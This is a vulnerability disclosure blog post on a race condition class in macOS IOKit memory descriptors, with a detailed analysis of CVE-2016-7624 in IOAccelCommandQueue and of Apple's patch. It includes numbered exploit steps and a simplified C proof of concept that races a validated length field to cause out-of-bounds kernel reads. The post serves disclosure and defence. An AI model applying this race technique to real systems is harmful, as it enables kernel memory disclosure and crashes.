This blog post is about a new class of vulnerabilities in IOKit that I discovered and reported to Apple in 2016. A brief scan of macOS with an IDA script turned up at least four bugs, for which three CVEs were assigned (CVE-2016-7620/4/5); see https://support.apple.com/kb/HT207423. I was told afterwards that there were even more issues of this type in the iOS/OS X IOKit drivers, and fortunately Apple fixed those as well.



Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

    kern_return_t
    IOConnectCallMethod(
        mach_port_t      connection,        // In
        uint32_t         selector,          // In
        const uint64_t  *input,             // In
        uint32_t         inputCnt,          // In
        const void      *inputStruct,       // In
        size_t           inputStructCnt,    // In
        uint64_t        *output,            // Out
        uint32_t        *outputCnt,         // In/Out
        void            *outputStruct,      // Out
        size_t          *outputStructCntP)  // In/Out
    {
        //...
        if (inputStructCnt <= sizeof(io_struct_inband_t)) {
            inb_input      = (void *) inputStruct;
            inb_input_size = (mach_msg_type_number_t) inputStructCnt;
        }
        else {
            ool_input      = reinterpret_cast_mach_vm_address_t(inputStruct);
            ool_input_size = inputStructCnt;
        }
        //...
            else if (size <= sizeof(io_struct_inband_t)) {
                inb_output      = outputStruct;
                inb_output_size = (mach_msg_type_number_t) size;
            }
            else {
                ool_output      = reinterpret_cast_mach_vm_address_t(outputStruct);
                ool_output_size = (mach_vm_size_t) size;
            }
        }

        rtn = io_connect_method(connection, selector,
                                (uint64_t *) input, inputCnt,
                                inb_input, inb_input_size,
                                ool_input, ool_input_size,
                                inb_output, &inb_output_size,
                                output, outputCnt,
                                ool_output, &ool_output_size);
        //...
        return rtn;
    }

If inputStruct is larger than sizeof(io_struct_inband_t), the argument is cast to a mach_vm_address_t and passed out-of-line; otherwise it is passed inband as a plain native pointer.
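To make the split concrete, here is a minimal sketch of that size decision in plain C. It assumes sizeof(io_struct_inband_t) is 4096 bytes, which is what the `inband_inputCnt > 4096` check in the generated MIG stub suggests; the names INBAND_STRUCT_MAX, input_path_t and classify_struct_input are made up for illustration and are not part of IOKit.

```c
#include <stddef.h>

/* Assumption: io_struct_inband_t is a 4096-byte array (see the MIG stub's
 * "inband_inputCnt > 4096" check). This constant is illustrative only. */
#define INBAND_STRUCT_MAX 4096u

/* Hypothetical labels for the two ways a struct input can travel. */
typedef enum {
    PATH_INBAND, /* bytes are copied into the Mach message */
    PATH_OOL     /* only the userspace address and size are sent */
} input_path_t;

/* Mirrors the "inputStructCnt <= sizeof(io_struct_inband_t)" test
 * in IOConnectCallMethod. */
static input_path_t classify_struct_input(size_t input_struct_cnt)
{
    return input_struct_cnt <= INBAND_STRUCT_MAX ? PATH_INBAND : PATH_OOL;
}
```

Anything classified as PATH_OOL is the interesting case for the rest of this post, because only an address crosses the boundary, not a copy of the data.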

Is this one race-able? No? Is that one race-able?

A curious mind might ask: is there any way this can be abused to cause a TOCTOU? Historical vulnerabilities focused on racing memory shared via IOConnectMapMemory, whose purpose is obvious from its name (see Pangu's and Ian Beer's research); however, these kinds of vulnerabilities have mostly been eliminated by now.

So eyes turn to these simple and naive IOKit arguments: are these benign little spirits even race-able?

Let's see how these arguments are passed from userspace to kernel space.

In the MIG definitions and the generated code, different input types are handled in different ways.

    routine io_connect_method(
              connection      : io_connect_t;
        in    selector        : uint32_t;

        in    scalar_input    : io_scalar_inband64_t;
        in    inband_input    : io_struct_inband_t;
        in    ool_input       : mach_vm_address_t;
        in    ool_input_size  : mach_vm_size_t;

        out   inband_output   : io_struct_inband_t, CountInOut;
        out   scalar_output   : io_scalar_inband64_t, CountInOut;
        in    ool_output      : mach_vm_address_t;
        inout ool_output_size : mach_vm_size_t
    );

The following code is generated:

    /* Routine io_connect_method */
    mig_external kern_return_t io_connect_method
    (
        mach_port_t connection,
        uint32_t selector,
        io_scalar_inband64_t scalar_input,
        mach_msg_type_number_t scalar_inputCnt,
        io_struct_inband_t inband_input,
        mach_msg_type_number_t inband_inputCnt,
        mach_vm_address_t ool_input,
        mach_vm_size_t ool_input_size,
        io_struct_inband_t inband_output,
        mach_msg_type_number_t *inband_outputCnt,
        io_scalar_inband64_t scalar_output,
        mach_msg_type_number_t *scalar_outputCnt,
        mach_vm_address_t ool_output,
        mach_vm_size_t *ool_output_size
    )
    {
        //...
        (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
        //...
        if (inband_inputCnt > 4096) {
            { return MIG_ARRAY_TOO_LARGE; }
        }
        (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
        //...
        InP->ool_input = ool_input;
        InP->ool_input_size = ool_input_size;

OK, it seems scalar input and struct input of size <= 4096 are copied and bundled inband in the Mach message, then passed into kernel space. No way to race those.

However, struct input with size > 4096 stays a mach_vm_address_t and is passed through untouched.

Now let's dive into kernel space:

    kern_return_t is_io_connect_method
    (
        io_connect_t connection,
        uint32_t selector,
        io_scalar_inband64_t scalar_input,
        mach_msg_type_number_t scalar_inputCnt,
        io_struct_inband_t inband_input,
        mach_msg_type_number_t inband_inputCnt,
        mach_vm_address_t ool_input,
        mach_vm_size_t ool_input_size,
        io_struct_inband_t inband_output,
        mach_msg_type_number_t *inband_outputCnt,
        io_scalar_inband64_t scalar_output,
        mach_msg_type_number_t *scalar_outputCnt,
        mach_vm_address_t ool_output,
        mach_vm_size_t *ool_output_size
    )
    {
        CHECK( IOUserClient, connection, client );

        IOExternalMethodArguments args;
        IOReturn ret;
        IOMemoryDescriptor * inputMD  = 0;
        IOMemoryDescriptor * outputMD = 0;
        //...
        args.scalarInput = scalar_input;
        args.scalarInputCount = scalar_inputCnt;
        args.structureInput = inband_input;
        args.structureInputSize = inband_inputCnt;

        if (ool_input)
            inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                                                           kIODirectionOut, current_task());

        args.structureInputDescriptor = inputMD;
        //...
        if (ool_output && ool_output_size)
        {
            outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
                                                            kIODirectionIn, current_task());
        //...
        return (ret);
    }

It seems Apple and Linux take different approaches here. In the Linux kernel, incoming userspace content is usually copied into kernel-allocated memory using copy_from_user. Here, however, the Apple kernel creates a memory descriptor directly from the userspace address rather than making a copy.

So can we modify this memory content from userspace after it has been passed to the kernel via an IOKit call?

Surprisingly, the answer is yes!

This means that, for an IOKit call whose IOService accepts an input memory descriptor, the userspace program can alter the content while the IOService is processing it: no lock, no write protection. A juicy place for race conditions and TOCTOUs (time-of-check to time-of-use) :) After this bug was fixed I talked to security folks at Apple, and they said even they hadn't realized that descriptor-mapped memory is writable by userspace.

I quickly identified several potentially vulnerable patterns in IOReportUserClient, IOAccelCommandQueue and IOSurface; one of them (CVE-2016-7624) is described below. There are far more patterns than that, so use your imagination :)

TOCTOU in IOAccelCommandQueue can lead to information disclosure reachable from sandbox

There exists a TOCTOU in IOAccelCommandQueue::submit_command_buffers. This function accepts either an inband struct or a structureInputDescriptor. Attacker-controlled data is passed into the function, and a value at a certain offset is used as a length. The length is validated, but because of the nature of the memory descriptor, the client can still change the value before it is actually used by modifying the mapped memory. The resulting TOCTOU leads to information disclosure and possibly an out-of-bounds write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accepts the user-supplied IOExternalMethodArguments. If a structureInputDescriptor was created from a userspace-mapped address, the function maps it into an IOMemoryMap, takes the mapped address and works on it directly. But nothing prevents userspace from modifying the content behind that address, which leads to a TOCTOU.

    __int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
    {
      IOExternalMethodArguments *v3; // r12@1
      IOAccelCommandQueue *v4; // r15@1
      unsigned __int64 inputdatalen; // rsi@1
      unsigned int v6; // ebx@1
      IOMemoryDescriptor *v7; // rdi@3
      __int64 v8; // r14@3
      __int64 inputdata; // rcx@5

      v3 = a3;
      v4 = this;
      inputdatalen = (unsigned int)a3->structureInputSize;
      v6 = -536870206;
      if ( inputdatalen >= 8
        && inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
      {
        v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
        v8 = 0LL;
        if ( v7 )
        {
          v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
          v6 = -536870200;
          if ( !v8 )
            return v6;
          inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
          LODWORD(inputdatalen) = v3->structureInputSize;
        }

We can see that the DWORD at offset +4 is retrieved as a length and validated against a value derived from inputdatalen: ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

The length at this offset is then read again in submit_command_buffers. See the following code:

    if ( *((_QWORD *)this + 160) )
    {
      v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
      if ( v5 )
      {
        IOAccelShared2::processResourceDirtyCommands(v5);
        IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
        if ( *(_DWORD *)(input + 4) )
        {
          v6 = (unsigned __int64 *)(input + 24);
          v7 = 0LL;
          do
          {
            IOAccelCommandQueue::submitCommandBuffer(
              (IOAccelCommandQueue *)v2,
              *((_DWORD *)v6 - 4),//v6 based on input
              *((_DWORD *)v6 - 3),//based on input
              *(v6 - 1),//based on input
              *v6);//based on input
            ++v7;
            v6 += 3;
          }
          while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
        }

Notice that in the loop condition (marked NOTICE HERE) *(input+4) is read again as the loop bound. If the user passes in a descriptor, they can modify this value from userland after the check in s_submit_command_buffers has passed, causing the loop to run out of bounds.
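The double fetch can be modeled in plain userspace C. The sketch below is not driver code: shared_header_t, race_hook_t, walk_double_fetch, walk_single_fetch and bump_count are hypothetical names, and the "race" is simulated deterministically by a callback that fires between the check and the use, standing in for a second thread writing to the shared page.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the start of the shared buffer:
 * the element count lives at offset +4. */
typedef struct {
    uint32_t reserved;
    uint32_t count;
} shared_header_t;

/* Simulated concurrent writer, invoked between check and use. */
typedef void (*race_hook_t)(volatile shared_header_t *hdr);

/* Vulnerable shape: the count is validated once, then fetched again
 * from shared memory as the loop bound. Returns iterations executed. */
static size_t walk_double_fetch(volatile shared_header_t *hdr,
                                uint32_t expected, race_hook_t hook)
{
    size_t iterations = 0;
    if (hdr->count != expected)      /* time of check */
        return 0;
    if (hook)
        hook(hdr);                   /* attacker rewrites the count here */
    for (uint32_t i = 0; i < hdr->count; i++)  /* time of use: second fetch */
        iterations++;
    return iterations;
}

/* Safer shape: fetch the count once into a local and use only the local. */
static size_t walk_single_fetch(volatile shared_header_t *hdr,
                                uint32_t expected, race_hook_t hook)
{
    size_t iterations = 0;
    uint32_t count = hdr->count;     /* single fetch */
    if (count != expected)
        return 0;
    if (hook)
        hook(hdr);                   /* later writes no longer matter */
    for (uint32_t i = 0; i < count; i++)
        iterations++;
    return iterations;
}

/* Example hook: inflate the count after validation. */
static void bump_count(volatile shared_header_t *hdr)
{
    hdr->count = 1000;
}
```

With a header whose count starts at 0xaa, walk_double_fetch with bump_count runs 1000 iterations even though 0xaa was validated, while walk_single_fetch stays at 0xaa. In the real driver each extra iteration reads 24 more bytes past the validated region.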

In IOAccelCommandQueue::submitCommandBuffer , in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24_minus_8,
      0LL,
      v13);
    result = IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24,
      0LL,
      v13);

The memory content is sent back to userspace if a notification callback is installed. So if an attacker can arrange for sensitive memory to sit right after the mapped descriptor memory, the out-of-bounds read returns that content to userspace, leading to an infoleak.

The exploit steps are:

The userspace program mmaps a memory page and passes it as the structureInputDescriptor argument of the IOKit call.

s_submit_command_buffers validates that the value at +4 is legal with respect to the total incoming structureInput length.

submit_command_buffers iterates over the descriptor memory passed in from userspace, using the value at +4 as the loop bound. The memory content it reads is processed in submitCommandBuffer and sent back to userspace via the installed asyncNotificationPort.

The userspace program races to modify the value at offset +4, causing the loop to run out of bounds and leak adjacent memory in the kernel address space.

Notice that inputdatalen is first retrieved from structureInputSize, so we cannot use the IOConnectCallMethod API directly: that API does not allow structureInput and structureInputDescriptor to be passed at the same time.

Instead we directly call the private io_connect_method function in the IOKit framework, which accepts structureInput and structureInputDescriptor at the same time.

POC code

POC code for all three of these vulnerabilities can be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is a simplified version of one of them:

    volatile unsigned int secs = 10;

    void *modifystrcut(void *arg)
    {
        // racing thread: overwrite the count at +4 of the shared page
        *((unsigned int*)(input+4)) = 0x7fffffff;
        printf("secs %x\n", secs);
        return NULL;
    }
    //...
    int main(int argc, const char * argv[])
    {
        io_iterator_t iterator;
        //...
        getFunc();
        io_connect_t conn;
        io_service_t svc;
        //...
        IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
        svc = IOIteratorNext(iterator);
        printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
        //...
        io_connect_t sharedconn;
        IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
        IOConnectAddClient(conn, sharedconn);
        //then set async ref
        ref = IONotificationPortCreate(kIOMasterPortDefault);
        port = IONotificationPortGetMachPort(ref);
        pthread_t rt;
        pthread_create(&rt, NULL, gaorunloop, NULL);
        io_async_ref64_t asyncRef;
        asyncRef[kIOAsyncCalloutFuncIndex] = callback;
        asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
        //...
        const uint32_t outputcnt = 0;
        const size_t outputcnt64 = 0;
        IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
        //...
        size_t i=0;
        input = dommap();
        {
            char* structinput = input;
            *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
            size_t outcnt = 0;
        }
        //...
        const size_t bufsize = 4088;
        char buf[bufsize];
        memset(buf, 'a', sizeof(buf)); // fill exactly bufsize bytes
        size_t outcnt =0;
        *((unsigned int*)(buf+4)) = 0xaa;
        //...
        {
            pthread_t t;
            pthread_create(&t, NULL, modifystrcut, NULL);
            //...
            io_connect_method(
                conn,
                1,
                NULL,//input
                0,//inputCnt
                buf,//inb_input
                bufsize,//inb_input_size
                reinterpret_cast_mach_vm_address_t(input),//ool_input
                ool_size,//ool_input_size
                buf,//inb_output
                (mach_msg_type_number_t*)&outputcnt, //inb_output_size*
                (uint64_t*)buf,//output
                &outputcnt, //outputCnt
                reinterpret_cast_mach_vm_address_t(buf), //ool_output
                (mach_msg_type_number_t*)&outputcnt64//ool_output_size*
            );
        }

The two key constants are 4088 and 0xaa; these two numbers satisfy the checks at

inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen - 8) >> 64) >> 4) )
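Why 4088 and 0xaa? The 0xAAAAAAAAAAAAAAAB multiply-and-shift is the usual compiler idiom for division by 3, so the first check amounts to "inputdatalen - 8 is a multiple of 24" and the second to "the DWORD at +4 equals (inputdatalen - 8) / 24". The sketch below reproduces both expressions so the numbers can be checked; it assumes a compiler with unsigned __int128 (GCC or Clang on a 64-bit target), and the helper names mulhi64, size_check and expected_count are mine, not the driver's.

```c
#include <stdbool.h>
#include <stdint.h>

#define DIV3_MAGIC 0xAAAAAAAAAAAAAAABULL  /* equals (2^65 + 1) / 3 */

/* High 64 bits of a 64x64-bit multiply, i.e. the ">> 64" in the decompilation. */
static uint64_t mulhi64(uint64_t a, uint64_t b)
{
    return (uint64_t)(((unsigned __int128)a * b) >> 64);
}

/* First check: len >= 8 and (len - 8) == 3 * (((len - 8) / 3) & ~7),
 * which holds exactly when (len - 8) is a multiple of 24. */
static bool size_check(uint64_t len)
{
    if (len < 8)
        return false;
    uint64_t x = len - 8;
    return x == 3 * ((mulhi64(DIV3_MAGIC, x) >> 1) & 0x7FFFFFFFFFFFFFF8ULL);
}

/* Second check: the count the driver expects at offset +4,
 * i.e. (len - 8) / 24 computed as mulhi >> 4. */
static uint32_t expected_count(uint32_t len)
{
    return (uint32_t)(mulhi64(DIV3_MAGIC, (uint64_t)len - 8) >> 4);
}
```

For the PoC values, 4088 - 8 = 4080 = 24 * 170, and 170 is 0xaa, so an 8-byte header followed by 170 entries of 24 bytes passes both checks.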

Panic Report

    panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
    CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
    RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
    RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
    R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
    R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
    RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010
    Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0

    Backtrace (CPU 0), Frame : Return Address
    0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
    0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
    0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
    0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
    0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
    0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
    0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
    0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
    0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
    0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
    0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
    0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
    0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
          Kernel Extensions in backtrace:
             com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
                dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
                dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
             com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
                dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
                dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
                dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
                dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000

    BSD process name corresponding to current thread: cmdqueue1
    Boot args: keepsyms=1 -v

    Mac OS version:
    15F34

    Kernel version:
    Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
    Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
    Kernel slide:     0x000000001dc00000
    Kernel text base: 0xffffff801de00000
    __HIB  text base: 0xffffff801dd00000
    System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling around the faulting RIP:

    __text:000000000002929E    mov     esi, [rbx-10h]    ; unsigned int
    __text:00000000000292A1    mov     edx, [rbx-0Ch]    ; unsigned int
    __text:00000000000292A4    mov     rcx, [rbx-8]      ; unsigned __int64
    __text:00000000000292A8    mov     r8, [rbx]         ; unsigned __int64

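We can see that at the crash address rbx has already gone out of bounds: with RBX = 0xffffff812735f008, the faulting load from [rbx-8] touches 0xffffff812735f000, which matches CR2. It hits an adjacent unmapped page, leading to the crash.

Tested on MacBook Airs and MacBook Pros running 10.11.5, with the command line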

while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.12.2 haven't been released yet, but let's have a look at the disassembled kernel.

Originally, we have these lines when creating a descriptor:

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                                                       kIODirectionOut, current_task());

This is confirmed by disassembling the unpatched kernel:

    mov     rax, gs:8
    mov     rcx, [rax+308h]    ; unsigned int
    mov     edx, 2             ; unsigned __int64
    mov     rsi, [rbp+arg_8]   ; unsigned __int64
    call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
    mov     r15, rax

On 10.12.2, the corresponding snippet in _is_io_connect_method has changed to:

    mov     rax, gs:8
    mov     rcx, [rax+318h]    ; unsigned int
    mov     edx, 20002h        ; unsigned __int64
    mov     rsi, [rbp+arg_8]   ; unsigned __int64
    call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
    mov     r15, rax

A new flag (0x20000) is now passed to IOMemoryDescriptor::withAddressRange. The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown by a Diaphora diff of IOMemoryDescriptor's functions.

    if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source
      err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef);

The added option bit (4) is then checked at the beginning of this function:

    prot = 1;
    cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28;
    v4 = vmProtForCacheMode(cacheMode);
    prot |= v4;
    if ( cacheMode )
      prot |= 2u;
    if ( 2 != (this->baseclass_0._flags & 3) )
      prot |= 2u;
    if ( optionsa & 2 )
      prot |= 2u;
    if ( optionsa & 4 )
      prot |= 0x200000u;

prot is then passed to mach_make_memory_entry_64, where it describes the permissions of the mapping. 0x200000 is actually MAP_MEM_VM_COPY:

    /* leave room for vm_prot bits */
    #define MAP_MEM_ONLY            0x010000 /* change processor caching */
    #define MAP_MEM_NAMED_CREATE    0x020000 /* create extant object */
    #define MAP_MEM_PURGABLE        0x040000 /* create a purgable VM object */
    #define MAP_MEM_NAMED_REUSE     0x080000 /* reuse provided entry if identical */
    #define MAP_MEM_USE_DATA_ADDR   0x100000 /* preserve address of data, rather than base of page */
    #define MAP_MEM_VM_COPY         0x200000 /* make a copy of a VM range */
    #define MAP_MEM_VM_SHARE        0x400000 /* extract a VM range for remap */
    #define MAP_MEM_4K_DATA_ADDR    0x800000 /* preserve 4K aligned address of data */
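To see what the patched call ends up requesting, the decompiled prot computation can be replayed in userspace. This is only a sketch of the decompilation above, not XNU source: compute_prot is a made-up name, and the cache_prot parameter stands in for the return value of vmProtForCacheMode, which I assume contributes no extra bits for the default cache mode.

```c
#include <stdint.h>

#define VM_PROT_READ     0x1u
#define VM_PROT_WRITE    0x2u
#define MAP_MEM_VM_COPY  0x200000u

/* Replays the decompiled logic at the start of memoryReferenceCreate.
 * flags      : the descriptor's _flags (0x20002 in the patched caller)
 * options    : the options argument (bit 4 is set by the newly added path)
 * cache_prot : assumed result of vmProtForCacheMode(cacheMode) */
static uint32_t compute_prot(uint32_t flags, uint32_t options, uint32_t cache_prot)
{
    uint32_t prot = VM_PROT_READ;
    uint32_t cache_mode = (flags & 0x70000000u) >> 28;

    prot |= cache_prot;
    if (cache_mode)
        prot |= VM_PROT_WRITE;
    if (2 != (flags & 3))            /* direction is not kIODirectionOut */
        prot |= VM_PROT_WRITE;
    if (options & 2)
        prot |= VM_PROT_WRITE;
    if (options & 4)                 /* set only when flag 0x20000 is present */
        prot |= MAP_MEM_VM_COPY;
    return prot;
}
```

Under those assumptions, compute_prot(0x20002, 4, 0) gives 0x200001: a read-only memory entry with MAP_MEM_VM_COPY set, whereas without option 4 the same descriptor yields just 0x1.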

This means that descriptors passed in via IOKit are now backed by a memory entry that is possibly copy-on-write, which prevents userspace from modifying the content the kernel sees in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry point.

Credits

Credit also goes to Liang Chen of KeenLab for contributing to this research. Kudos as well to the Apple security team for responding to and fixing these issues.